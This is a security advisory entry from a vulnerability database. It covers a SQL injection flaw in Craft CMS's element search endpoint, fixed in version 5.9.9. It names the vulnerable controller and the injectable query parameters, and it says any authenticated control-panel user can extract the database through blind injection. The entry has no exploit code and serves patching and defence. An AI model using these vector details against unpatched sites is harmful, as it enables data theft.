Web Application Vulnerabilities Runtime SCA Findings
Looking for the vulnerability index of Invicti's legacy products?
Invicti Enterprise Acunetix Standard & Premium
Craft CMS Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Vulnerability - CVE-2026-31858 - Vulnerability Database
Craft CMS

Craft CMS Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Vulnerability - CVE-2026-31858

High
Reference: CVE-2026-31858
NVD Link: https://nvd.nist.gov/vuln/detail/CVE-2026-31858
Title: Craft CMS Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Vulnerability
Overview:

Craft is a content management system (CMS). The ElementSearchController::actionSearch() endpoint is missing the unset() protection that was added to ElementIndexesController in CVE-2026-25495. The exact same SQL injection vulnerability (including criteriaorderBy the original advisory vector) works on this controller because the fix was never applied to it. Any authenticated control panel user (no admin required) can inject arbitrary SQL via criteriawhere criteriaorderBy or other query properties and extract the full database contents via boolean-based blind injection. Users should update to the patched 5.9.9 release to mitigate the issue.